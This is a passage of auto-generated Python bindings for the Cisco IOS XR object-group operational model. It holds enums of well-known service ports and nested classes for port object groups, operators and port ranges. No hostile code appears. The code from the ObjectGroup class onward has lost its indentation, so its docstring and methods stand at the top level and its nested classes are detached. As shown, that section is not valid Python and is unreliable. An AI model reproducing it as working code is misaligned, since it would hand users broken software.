        FTP data connections (used infrequently, 20)
    .. data:: ftp = 21
        File Transfer Protocol (21)
    .. data:: ssh = 22
        Secure Shell (22)
    .. data:: telnet = 23
        Telnet (23)
    .. data:: smtp = 25
        Simple Mail Transport Protocol (25)
    .. data:: time = 37
        Time (37)
    .. data:: nicname = 43
        Nicname (43)
    .. data:: tacacs = 49
        TAC Access Control System (49)
    .. data:: domain = 53
        Domain Name Service (53)
    .. data:: gopher = 70
        Gopher (70)
    .. data:: finger = 79
        Finger (79)
    .. data:: www = 80
        World Wide Web (HTTP, 80)
    .. data:: host_name = 101
        NIC hostname server (101)
    .. data:: pop2 = 109
        Post Office Protocol v2 (109)
    .. data:: pop3 = 110
        Post Office Protocol v3 (110)
    .. data:: sun_rpc = 111
        Sun Remote Procedure Call (111)
    .. data:: ident = 113
        Ident Protocol (113)
    .. data:: nntp = 119
        Network News Transport Protocol (119)
    .. data:: bgp = 179
        Border Gateway Protocol (179)
    .. data:: irc = 194
        Internet Relay Chat (194)
    .. data:: pim_auto_rp = 496
        PIM Auto-RP (496)
    .. data:: exec_ = 512
        Exec (rsh, 512)
    .. data:: login = 513
        Login (rlogin, 513)
    .. data:: cmd = 514
        Remote commands (rcmd, 514)
    .. data:: lpd = 515
        Printer service (515)
    .. data:: uucp = 540
        Unix-to-Unix Copy Program (540)
    .. data:: klogin = 543
        Kerberos login (543)
    .. data:: kshell = 544
        Kerberos shell (544)
    .. data:: talk = 517
        Talk (517)
    .. data:: ldp = 646
        LDP session connection attempts (MPLS, 646)
    """

    # Generated enum members: each YLeaf pairs the numeric value with the
    # YANG identifier string (note "exec_" maps to YANG "exec", a Python
    # keyword-avoidance rename; hyphenated YANG names use underscores).
    echo = Enum.YLeaf(7, "echo")

    discard = Enum.YLeaf(9, "discard")

    daytime = Enum.YLeaf(13, "daytime")

    chargen = Enum.YLeaf(19, "chargen")

    ftp_data = Enum.YLeaf(20, "ftp-data")

    ftp = Enum.YLeaf(21, "ftp")

    ssh = Enum.YLeaf(22, "ssh")

    telnet = Enum.YLeaf(23, "telnet")

    smtp = Enum.YLeaf(25, "smtp")

    time = Enum.YLeaf(37, "time")

    nicname = Enum.YLeaf(43, "nicname")

    tacacs = Enum.YLeaf(49, "tacacs")

    domain = Enum.YLeaf(53, "domain")

    gopher = Enum.YLeaf(70, "gopher")

    finger = Enum.YLeaf(79, "finger")

    www = Enum.YLeaf(80, "www")

    host_name = Enum.YLeaf(101, "host-name")

    pop2 = Enum.YLeaf(109, "pop2")

    pop3 = Enum.YLeaf(110, "pop3")

    sun_rpc = Enum.YLeaf(111, "sun-rpc")

    ident = Enum.YLeaf(113, "ident")

    nntp = Enum.YLeaf(119, "nntp")

    bgp = Enum.YLeaf(179, "bgp")

    irc = Enum.YLeaf(194, "irc")

    pim_auto_rp = Enum.YLeaf(496, "pim-auto-rp")

    exec_ = Enum.YLeaf(512, "exec")

    login = Enum.YLeaf(513, "login")

    cmd = Enum.YLeaf(514, "cmd")

    lpd = Enum.YLeaf(515, "lpd")

    uucp = Enum.YLeaf(540, "uucp")

    klogin = Enum.YLeaf(543, "klogin")

    kshell = Enum.YLeaf(544, "kshell")

    talk = Enum.YLeaf(517, "talk")

    ldp = Enum.YLeaf(646, "ldp")

    @staticmethod
    def _meta_info():
        # Lazy import: the generated _meta module is large, so it is only
        # loaded when metadata is actually requested.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
        return meta._meta_table['EndPort']
class Port(Enum):
    """
    Port (Enum Class)

    Port

    .. data:: echo = 7
        Echo (7)
    .. data:: discard = 9
        Discard (9)
    .. data:: daytime = 13
        Daytime (13)
    .. data:: chargen = 19
        Character generator (19)
    .. data:: ftp_data = 20
        FTP data connections (used infrequently, 20)
    .. data:: ftp = 21
        File Transfer Protocol (21)
    .. data:: ssh = 22
        Secure Shell (22)
    .. data:: telnet = 23
        Telnet (23)
    .. data:: smtp = 25
        Simple Mail Transport Protocol (25)
    .. data:: time = 37
        Time (37)
    .. data:: nicname = 43
        Nicname (43)
    .. data:: tacacs = 49
        TAC Access Control System (49)
    .. data:: domain = 53
        Domain Name Service (53)
    .. data:: gopher = 70
        Gopher (70)
    .. data:: finger = 79
        Finger (79)
    .. data:: www = 80
        World Wide Web (HTTP, 80)
    .. data:: host_name = 101
        NIC hostname server (101)
    .. data:: pop2 = 109
        Post Office Protocol v2 (109)
    .. data:: pop3 = 110
        Post Office Protocol v3 (110)
    .. data:: sun_rpc = 111
        Sun Remote Procedure Call (111)
    .. data:: ident = 113
        Ident Protocol (113)
    .. data:: nntp = 119
        Network News Transport Protocol (119)
    .. data:: bgp = 179
        Border Gateway Protocol (179)
    .. data:: irc = 194
        Internet Relay Chat (194)
    .. data:: pim_auto_rp = 496
        PIM Auto-RP (496)
    .. data:: exec_ = 512
        Exec (rsh, 512)
    .. data:: login = 513
        Login (rlogin, 513)
    .. data:: cmd = 514
        Remote commands (rcmd, 514)
    .. data:: lpd = 515
        Printer service (515)
    .. data:: uucp = 540
        Unix-to-Unix Copy Program (540)
    .. data:: klogin = 543
        Kerberos login (543)
    .. data:: kshell = 544
        Kerberos shell (544)
    .. data:: talk = 517
        Talk (517)
    .. data:: ldp = 646
        LDP session connection attempts (MPLS, 646)
    """

    # Each member pairs the IANA port number with the YANG identifier
    # string used on the wire.  'exec_' carries a trailing underscore
    # because 'exec' is a reserved word in Python 2.
    echo = Enum.YLeaf(7, "echo")

    discard = Enum.YLeaf(9, "discard")

    daytime = Enum.YLeaf(13, "daytime")

    chargen = Enum.YLeaf(19, "chargen")

    ftp_data = Enum.YLeaf(20, "ftp-data")

    ftp = Enum.YLeaf(21, "ftp")

    ssh = Enum.YLeaf(22, "ssh")

    telnet = Enum.YLeaf(23, "telnet")

    smtp = Enum.YLeaf(25, "smtp")

    time = Enum.YLeaf(37, "time")

    nicname = Enum.YLeaf(43, "nicname")

    tacacs = Enum.YLeaf(49, "tacacs")

    domain = Enum.YLeaf(53, "domain")

    gopher = Enum.YLeaf(70, "gopher")

    finger = Enum.YLeaf(79, "finger")

    www = Enum.YLeaf(80, "www")

    host_name = Enum.YLeaf(101, "host-name")

    pop2 = Enum.YLeaf(109, "pop2")

    pop3 = Enum.YLeaf(110, "pop3")

    sun_rpc = Enum.YLeaf(111, "sun-rpc")

    ident = Enum.YLeaf(113, "ident")

    nntp = Enum.YLeaf(119, "nntp")

    bgp = Enum.YLeaf(179, "bgp")

    irc = Enum.YLeaf(194, "irc")

    pim_auto_rp = Enum.YLeaf(496, "pim-auto-rp")

    exec_ = Enum.YLeaf(512, "exec")

    login = Enum.YLeaf(513, "login")

    cmd = Enum.YLeaf(514, "cmd")

    lpd = Enum.YLeaf(515, "lpd")

    uucp = Enum.YLeaf(540, "uucp")

    klogin = Enum.YLeaf(543, "klogin")

    kshell = Enum.YLeaf(544, "kshell")

    # NOTE: talk (517) deliberately appears after kshell (544); member
    # order follows the YANG model definition, not numeric order.
    talk = Enum.YLeaf(517, "talk")

    ldp = Enum.YLeaf(646, "ldp")


    @staticmethod
    def _meta_info():
        # Deferred import: the generated _meta tables are large, so they
        # are only loaded when meta information is actually requested.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
        return meta._meta_table['Port']
class PortOperator(Enum):
    """
    PortOperator (Enum Class)

    Port operator

    .. data:: equal = 0
        Match packets on ports equal to entered port number
    .. data:: not_equal = 1
        Match packets on ports not equal to entered port number
    .. data:: greater_than = 2
        Match packets on ports greater than entered port number
    .. data:: less_than = 3
        Match packets on ports less than entered port number
    """

    # Comparison operator applied to a port value when matching packets.
    equal = Enum.YLeaf(0, "equal")

    not_equal = Enum.YLeaf(1, "not-equal")

    greater_than = Enum.YLeaf(2, "greater-than")

    less_than = Enum.YLeaf(3, "less-than")


    @staticmethod
    def _meta_info():
        # Deferred import keeps the heavyweight meta tables out of the
        # normal import path.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
        return meta._meta_table['PortOperator']
class StartPort(Enum):
    """
    StartPort (Enum Class)

    Start port

    .. data:: echo = 7
        Echo (7)
    .. data:: discard = 9
        Discard (9)
    .. data:: daytime = 13
        Daytime (13)
    .. data:: chargen = 19
        Character generator (19)
    .. data:: ftp_data = 20
        FTP data connections (used infrequently, 20)
    .. data:: ftp = 21
        File Transfer Protocol (21)
    .. data:: ssh = 22
        Secure Shell (22)
    .. data:: telnet = 23
        Telnet (23)
    .. data:: smtp = 25
        Simple Mail Transport Protocol (25)
    .. data:: time = 37
        Time (37)
    .. data:: nicname = 43
        Nicname (43)
    .. data:: tacacs = 49
        TAC Access Control System (49)
    .. data:: domain = 53
        Domain Name Service (53)
    .. data:: gopher = 70
        Gopher (70)
    .. data:: finger = 79
        Finger (79)
    .. data:: www = 80
        World Wide Web (HTTP, 80)
    .. data:: host_name = 101
        NIC hostname server (101)
    .. data:: pop2 = 109
        Post Office Protocol v2 (109)
    .. data:: pop3 = 110
        Post Office Protocol v3 (110)
    .. data:: sun_rpc = 111
        Sun Remote Procedure Call (111)
    .. data:: ident = 113
        Ident Protocol (113)
    .. data:: nntp = 119
        Network News Transport Protocol (119)
    .. data:: bgp = 179
        Border Gateway Protocol (179)
    .. data:: irc = 194
        Internet Relay Chat (194)
    .. data:: pim_auto_rp = 496
        PIM Auto-RP (496)
    .. data:: exec_ = 512
        Exec (rsh, 512)
    .. data:: login = 513
        Login (rlogin, 513)
    .. data:: cmd = 514
        Remote commands (rcmd, 514)
    .. data:: lpd = 515
        Printer service (515)
    .. data:: uucp = 540
        Unix-to-Unix Copy Program (540)
    .. data:: klogin = 543
        Kerberos login (543)
    .. data:: kshell = 544
        Kerberos shell (544)
    .. data:: talk = 517
        Talk (517)
    .. data:: ldp = 646
        LDP session connection attempts (MPLS, 646)
    """

    # Lower bound of a port range; same well-known-port values as the
    # Port and EndPort enums in this module.
    echo = Enum.YLeaf(7, "echo")

    discard = Enum.YLeaf(9, "discard")

    daytime = Enum.YLeaf(13, "daytime")

    chargen = Enum.YLeaf(19, "chargen")

    ftp_data = Enum.YLeaf(20, "ftp-data")

    ftp = Enum.YLeaf(21, "ftp")

    ssh = Enum.YLeaf(22, "ssh")

    telnet = Enum.YLeaf(23, "telnet")

    smtp = Enum.YLeaf(25, "smtp")

    time = Enum.YLeaf(37, "time")

    nicname = Enum.YLeaf(43, "nicname")

    tacacs = Enum.YLeaf(49, "tacacs")

    domain = Enum.YLeaf(53, "domain")

    gopher = Enum.YLeaf(70, "gopher")

    finger = Enum.YLeaf(79, "finger")

    www = Enum.YLeaf(80, "www")

    host_name = Enum.YLeaf(101, "host-name")

    pop2 = Enum.YLeaf(109, "pop2")

    pop3 = Enum.YLeaf(110, "pop3")

    sun_rpc = Enum.YLeaf(111, "sun-rpc")

    ident = Enum.YLeaf(113, "ident")

    nntp = Enum.YLeaf(119, "nntp")

    bgp = Enum.YLeaf(179, "bgp")

    irc = Enum.YLeaf(194, "irc")

    pim_auto_rp = Enum.YLeaf(496, "pim-auto-rp")

    exec_ = Enum.YLeaf(512, "exec")

    login = Enum.YLeaf(513, "login")

    cmd = Enum.YLeaf(514, "cmd")

    lpd = Enum.YLeaf(515, "lpd")

    uucp = Enum.YLeaf(540, "uucp")

    klogin = Enum.YLeaf(543, "klogin")

    kshell = Enum.YLeaf(544, "kshell")

    # NOTE: talk (517) appears after kshell (544); order mirrors the
    # YANG model, not numeric order.
    talk = Enum.YLeaf(517, "talk")

    ldp = Enum.YLeaf(646, "ldp")


    @staticmethod
    def _meta_info():
        # Deferred import of the generated meta tables.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
        return meta._meta_table['StartPort']
class ObjectGroup(_Entity_):
"""
Object\-group operational data
.. attribute:: port
Port object group
**type**\: :py:class:`Port <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port>`
**config**\: False
.. attribute:: network
Network object group
**type**\: :py:class:`Network <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
    """Build the top-level object-group entity with its port and network children."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(ObjectGroup, self).__init__()
    self._top_entity = None

    self.yang_name = "object-group"
    self.yang_parent_name = "Cisco-IOS-XR-infra-objmgr-oper"
    self.is_top_level_class = True
    self.has_list_ancestor = False
    self.ylist_key_names = []
    # Maps YANG child names to (python attribute, child class) pairs;
    # YDK introspects this ordering during (de)serialization.
    self._child_classes = OrderedDict([("port", ("port", ObjectGroup.Port)), ("network", ("network", ObjectGroup.Network))])
    self._leafs = OrderedDict()

    self.port = ObjectGroup.Port()
    self.port.parent = self
    self._children_name_map["port"] = "port"

    self.network = ObjectGroup.Network()
    self.network.parent = self
    self._children_name_map["network"] = "network"
    self._segment_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group"
    # Freeze: further attribute writes must go through _perform_setattr.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Route all attribute writes through YDK validation; the empty list
    # means this entity has no settable leafs of its own.
    self._perform_setattr(ObjectGroup, [], name, value)
class Port(_Entity_):
    """
    Port object group

    .. attribute:: objects

        Table of Object

        **type**\: :py:class:`Objects <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects>`

        **config**\: False
    """

    _prefix = 'infra-objmgr-oper'
    _revision = '2017-05-01'

    def __init__(self):
        """Initialize the port object-group container and its objects table."""
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(ObjectGroup.Port, self).__init__()

        self.yang_name = "port"
        self.yang_parent_name = "object-group"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("objects", ("objects", ObjectGroup.Port.Objects))])
        self._leafs = OrderedDict()

        self.objects = ObjectGroup.Port.Objects()
        self.objects.parent = self
        self._children_name_map["objects"] = "objects"
        self._segment_path = lambda: "port"
        self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/%s" % self._segment_path()
        self._is_frozen = True

    def __setattr__(self, name, value):
        # No settable leafs on this container; validation only.
        self._perform_setattr(ObjectGroup.Port, [], name, value)


    class Objects(_Entity_):
        """
        Table of Object

        .. attribute:: object

            Port object group

            **type**\: list of :py:class:`Object <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object>`

            **config**\: False
        """

        _prefix = 'infra-objmgr-oper'
        _revision = '2017-05-01'

        def __init__(self):
            """Initialize the keyed list container of port object groups."""
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(ObjectGroup.Port.Objects, self).__init__()

            self.yang_name = "objects"
            self.yang_parent_name = "port"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("object", ("object", ObjectGroup.Port.Objects.Object))])
            self._leafs = OrderedDict()

            # YList: an ordered, key-aware list of Object entries.
            self.object = YList(self)
            self._segment_path = lambda: "objects"
            self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/port/%s" % self._segment_path()
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(ObjectGroup.Port.Objects, [], name, value)


        class Object(_Entity_):
            """
            Port object group

            .. attribute:: object_name (key)

                Port object group name

                **type**\: str

                **length:** 1..64

                **config**\: False

            .. attribute:: nested_groups

                Table of NestedGroup

                **type**\: :py:class:`NestedGroups <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.NestedGroups>`

                **config**\: False

            .. attribute:: operators

                Table of Operator

                **type**\: :py:class:`Operators <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.Operators>`

                **config**\: False

            .. attribute:: port_ranges

                Table of PortRange

                **type**\: :py:class:`PortRanges <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.PortRanges>`

                **config**\: False

            .. attribute:: parent_groups

                Table of ParentGroup

                **type**\: :py:class:`ParentGroups <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.ParentGroups>`

                **config**\: False
            """

            _prefix = 'infra-objmgr-oper'
            _revision = '2017-05-01'

            def __init__(self):
                """Initialize a port object-group list entry (keyed by object_name)."""
                if sys.version_info > (3,):
                    super().__init__()
                else:
                    super(ObjectGroup.Port.Objects.Object, self).__init__()

                self.yang_name = "object"
                self.yang_parent_name = "objects"
                self.is_top_level_class = False
                self.has_list_ancestor = False
                # object_name is the YANG list key.
                self.ylist_key_names = ['object_name']
                self._child_classes = OrderedDict([("nested-groups", ("nested_groups", ObjectGroup.Port.Objects.Object.NestedGroups)), ("operators", ("operators", ObjectGroup.Port.Objects.Object.Operators)), ("port-ranges", ("port_ranges", ObjectGroup.Port.Objects.Object.PortRanges)), ("parent-groups", ("parent_groups", ObjectGroup.Port.Objects.Object.ParentGroups))])
                self._leafs = OrderedDict([
                    ('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
                ])
                self.object_name = None

                self.nested_groups = ObjectGroup.Port.Objects.Object.NestedGroups()
                self.nested_groups.parent = self
                self._children_name_map["nested_groups"] = "nested-groups"

                self.operators = ObjectGroup.Port.Objects.Object.Operators()
                self.operators.parent = self
                self._children_name_map["operators"] = "operators"

                self.port_ranges = ObjectGroup.Port.Objects.Object.PortRanges()
                self.port_ranges.parent = self
                self._children_name_map["port_ranges"] = "port-ranges"

                self.parent_groups = ObjectGroup.Port.Objects.Object.ParentGroups()
                self.parent_groups.parent = self
                self._children_name_map["parent_groups"] = "parent-groups"
                # Segment path embeds the list key as an XPath predicate.
                self._segment_path = lambda: "object" + "[object-name='" + str(self.object_name) + "']"
                self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/port/objects/%s" % self._segment_path()
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(ObjectGroup.Port.Objects.Object, ['object_name'], name, value)


            class NestedGroups(_Entity_):
                """
                Table of NestedGroup

                .. attribute:: nested_group

                    nested object group

                    **type**\: list of :py:class:`NestedGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.NestedGroups.NestedGroup>`

                    **config**\: False
                """

                _prefix = 'infra-objmgr-oper'
                _revision = '2017-05-01'

                def __init__(self):
                    """Initialize the container of nested object-group entries."""
                    if sys.version_info > (3,):
                        super().__init__()
                    else:
                        super(ObjectGroup.Port.Objects.Object.NestedGroups, self).__init__()

                    self.yang_name = "nested-groups"
                    self.yang_parent_name = "object"
                    self.is_top_level_class = False
                    # An ancestor ('object') is a keyed list, so no static
                    # absolute path can be generated for this node.
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("nested-group", ("nested_group", ObjectGroup.Port.Objects.Object.NestedGroups.NestedGroup))])
                    self._leafs = OrderedDict()

                    self.nested_group = YList(self)
                    self._segment_path = lambda: "nested-groups"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(ObjectGroup.Port.Objects.Object.NestedGroups, [], name, value)


                class NestedGroup(_Entity_):
                    """
                    nested object group

                    .. attribute:: nested_group_name (key)

                        Nested object group

                        **type**\: str

                        **length:** 1..64

                        **config**\: False

                    .. attribute:: nested_group_name_xr

                        Nested group

                        **type**\: str

                        **config**\: False
                    """

                    _prefix = 'infra-objmgr-oper'
                    _revision = '2017-05-01'

                    def __init__(self):
                        """Initialize a nested-group list entry (keyed by nested_group_name)."""
                        if sys.version_info > (3,):
                            super().__init__()
                        else:
                            super(ObjectGroup.Port.Objects.Object.NestedGroups.NestedGroup, self).__init__()

                        self.yang_name = "nested-group"
                        self.yang_parent_name = "nested-groups"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = ['nested_group_name']
                        self._child_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('nested_group_name', (YLeaf(YType.str, 'nested-group-name'), ['str'])),
                            ('nested_group_name_xr', (YLeaf(YType.str, 'nested-group-name-xr'), ['str'])),
                        ])
                        self.nested_group_name = None
                        self.nested_group_name_xr = None
                        self._segment_path = lambda: "nested-group" + "[nested-group-name='" + str(self.nested_group_name) + "']"
                        self._is_frozen = True

                    def __setattr__(self, name, value):
                        self._perform_setattr(ObjectGroup.Port.Objects.Object.NestedGroups.NestedGroup, ['nested_group_name', 'nested_group_name_xr'], name, value)

                    @staticmethod
                    def _meta_info():
                        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
                        return meta._meta_table['ObjectGroup.Port.Objects.Object.NestedGroups.NestedGroup']['meta_info']

                @staticmethod
                def _meta_info():
                    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
                    return meta._meta_table['ObjectGroup.Port.Objects.Object.NestedGroups']['meta_info']


            class Operators(_Entity_):
                """
                Table of Operator

                .. attribute:: operator

                    op class

                    **type**\: list of :py:class:`Operator <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.Operators.Operator>`

                    **config**\: False
                """

                _prefix = 'infra-objmgr-oper'
                _revision = '2017-05-01'

                def __init__(self):
                    """Initialize the container of port operator entries."""
                    if sys.version_info > (3,):
                        super().__init__()
                    else:
                        super(ObjectGroup.Port.Objects.Object.Operators, self).__init__()

                    self.yang_name = "operators"
                    self.yang_parent_name = "object"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("operator", ("operator", ObjectGroup.Port.Objects.Object.Operators.Operator))])
                    self._leafs = OrderedDict()

                    self.operator = YList(self)
                    self._segment_path = lambda: "operators"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(ObjectGroup.Port.Objects.Object.Operators, [], name, value)


                class Operator(_Entity_):
                    """
                    op class

                    .. attribute:: operator_type

                        operation for ports

                        **type**\: :py:class:`PortOperator <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.PortOperator>`

                        **config**\: False

                    .. attribute:: port

                        Port number

                        **type**\: union of the below types:

                        **type**\: :py:class:`Port <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.Port>`

                        **type**\: int

                        **range:** 0..65535

                        **config**\: False

                    .. attribute:: operator_type_xr

                        Operator

                        **type**\: int

                        **range:** 0..4294967295

                        **config**\: False

                    .. attribute:: port_xr

                        Port

                        **type**\: int

                        **range:** 0..4294967295

                        **config**\: False
                    """

                    _prefix = 'infra-objmgr-oper'
                    _revision = '2017-05-01'

                    def __init__(self):
                        """Initialize an unkeyed operator list entry."""
                        if sys.version_info > (3,):
                            super().__init__()
                        else:
                            super(ObjectGroup.Port.Objects.Object.Operators.Operator, self).__init__()

                        self.yang_name = "operator"
                        self.yang_parent_name = "operators"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([])
                        # 'port' is a union leaf (Port enum or raw int), so its
                        # YType is str and candidate types are listed in order.
                        self._leafs = OrderedDict([
                            ('operator_type', (YLeaf(YType.enumeration, 'operator-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper', 'PortOperator', '')])),
                            ('port', (YLeaf(YType.str, 'port'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper', 'Port', ''),'int'])),
                            ('operator_type_xr', (YLeaf(YType.uint32, 'operator-type-xr'), ['int'])),
                            ('port_xr', (YLeaf(YType.uint32, 'port-xr'), ['int'])),
                        ])
                        self.operator_type = None
                        self.port = None
                        self.operator_type_xr = None
                        self.port_xr = None
                        self._segment_path = lambda: "operator"
                        self._is_frozen = True

                    def __setattr__(self, name, value):
                        self._perform_setattr(ObjectGroup.Port.Objects.Object.Operators.Operator, ['operator_type', 'port', 'operator_type_xr', 'port_xr'], name, value)

                    @staticmethod
                    def _meta_info():
                        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
                        return meta._meta_table['ObjectGroup.Port.Objects.Object.Operators.Operator']['meta_info']

                @staticmethod
                def _meta_info():
                    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
                    return meta._meta_table['ObjectGroup.Port.Objects.Object.Operators']['meta_info']


            class PortRanges(_Entity_):
                """
                Table of PortRange

                .. attribute:: port_range

                    Match only packets on a given port range

                    **type**\: list of :py:class:`PortRange <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.PortRanges.PortRange>`

                    **config**\: False
                """

                _prefix = 'infra-objmgr-oper'
                _revision = '2017-05-01'

                def __init__(self):
                    """Initialize the container of port-range entries."""
                    if sys.version_info > (3,):
                        super().__init__()
                    else:
                        super(ObjectGroup.Port.Objects.Object.PortRanges, self).__init__()

                    self.yang_name = "port-ranges"
                    self.yang_parent_name = "object"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("port-range", ("port_range", ObjectGroup.Port.Objects.Object.PortRanges.PortRange))])
                    self._leafs = OrderedDict()

                    self.port_range = YList(self)
                    self._segment_path = lambda: "port-ranges"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(ObjectGroup.Port.Objects.Object.PortRanges, [], name, value)


                class PortRange(_Entity_):
                    """
                    Match only packets on a given port range

                    .. attribute:: start_port

                        Start port number

                        **type**\: union of the below types:

                        **type**\: :py:class:`StartPort <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.StartPort>`

                        **type**\: int

                        **range:** 0..65535

                        **config**\: False

                    .. attribute:: end_port

                        End port number

                        **type**\: union of the below types:

                        **type**\: :py:class:`EndPort <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.EndPort>`

                        **type**\: int

                        **range:** 0..65535

                        **config**\: False

                    .. attribute:: start_port_xr

                        Port start address

                        **type**\: int

                        **range:** 0..4294967295

                        **config**\: False

                    .. attribute:: end_port_xr

                        Port end address

                        **type**\: int

                        **range:** 0..4294967295

                        **config**\: False
                    """

                    _prefix = 'infra-objmgr-oper'
                    _revision = '2017-05-01'

                    def __init__(self):
                        """Initialize an unkeyed port-range list entry."""
                        if sys.version_info > (3,):
                            super().__init__()
                        else:
                            super(ObjectGroup.Port.Objects.Object.PortRanges.PortRange, self).__init__()

                        self.yang_name = "port-range"
                        self.yang_parent_name = "port-ranges"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([])
                        # start/end ports are union leafs (enum name or int).
                        self._leafs = OrderedDict([
                            ('start_port', (YLeaf(YType.str, 'start-port'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper', 'StartPort', ''),'int'])),
                            ('end_port', (YLeaf(YType.str, 'end-port'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper', 'EndPort', ''),'int'])),
                            ('start_port_xr', (YLeaf(YType.uint32, 'start-port-xr'), ['int'])),
                            ('end_port_xr', (YLeaf(YType.uint32, 'end-port-xr'), ['int'])),
                        ])
                        self.start_port = None
                        self.end_port = None
                        self.start_port_xr = None
                        self.end_port_xr = None
                        self._segment_path = lambda: "port-range"
                        self._is_frozen = True

                    def __setattr__(self, name, value):
                        self._perform_setattr(ObjectGroup.Port.Objects.Object.PortRanges.PortRange, ['start_port', 'end_port', 'start_port_xr', 'end_port_xr'], name, value)

                    @staticmethod
                    def _meta_info():
                        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
                        return meta._meta_table['ObjectGroup.Port.Objects.Object.PortRanges.PortRange']['meta_info']

                @staticmethod
                def _meta_info():
                    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
                    return meta._meta_table['ObjectGroup.Port.Objects.Object.PortRanges']['meta_info']


            class ParentGroups(_Entity_):
                """
                Table of ParentGroup

                .. attribute:: parent_group

                    Parent object group

                    **type**\: list of :py:class:`ParentGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.ParentGroups.ParentGroup>`

                    **config**\: False
                """

                _prefix = 'infra-objmgr-oper'
                _revision = '2017-05-01'

                def __init__(self):
                    """Initialize the container of parent-group entries."""
                    if sys.version_info > (3,):
                        super().__init__()
                    else:
                        super(ObjectGroup.Port.Objects.Object.ParentGroups, self).__init__()

                    self.yang_name = "parent-groups"
                    self.yang_parent_name = "object"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("parent-group", ("parent_group", ObjectGroup.Port.Objects.Object.ParentGroups.ParentGroup))])
                    self._leafs = OrderedDict()

                    self.parent_group = YList(self)
                    self._segment_path = lambda: "parent-groups"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(ObjectGroup.Port.Objects.Object.ParentGroups, [], name, value)


                class ParentGroup(_Entity_):
                    """
                    Parent object group

                    .. attribute:: parent_group_name (key)

                        Nested object group

                        **type**\: str

                        **length:** 1..64

                        **config**\: False

                    .. attribute:: parent_name

                        Parent node

                        **type**\: str

                        **config**\: False
